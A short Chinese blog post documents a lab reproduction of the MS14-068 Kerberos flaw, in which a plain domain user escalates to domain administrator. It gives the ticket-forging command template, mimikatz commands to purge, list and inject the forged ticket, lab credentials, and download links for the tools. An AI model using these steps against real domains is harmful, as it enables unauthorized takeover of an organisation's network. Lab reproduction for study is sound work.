[横向移动]ms14-068 复现

2023-10-19 20:47:10

[横向移动]ms14-068 复现

该漏洞允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。

DC 192.168.137.145
域账户 Add1 Admin@11

伪造证书

  • 访问DC的c盘 被拒绝 ?! 呜呜呜 原来小小域账户竟是我自己

    [横向移动]ms14-068 复现

  • 伪造

    MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>

    [横向移动]ms14-068 复现

  • mimikatz

    mimikatz # kerberos::purge          //清空当前凭证
mimikatz # kerberos::list           //查看当前机器凭证
mimikatz # kerberos::ptc 票据文件    //将上一步生成的票据注入到内存中

    票据文件 在MS14.068.exe的目录下

    [横向移动]ms14-068 复现

  • 连接到DC

    [横向移动]ms14-068 复现

工具下载

mimikatz:https://github.com/gentilkiwi/mimikatz/
MS14-068:https://github.com/abatchy17/WindowsExploits
上一篇:C++ STL 容器适配器


下一篇:vue json传参网络请求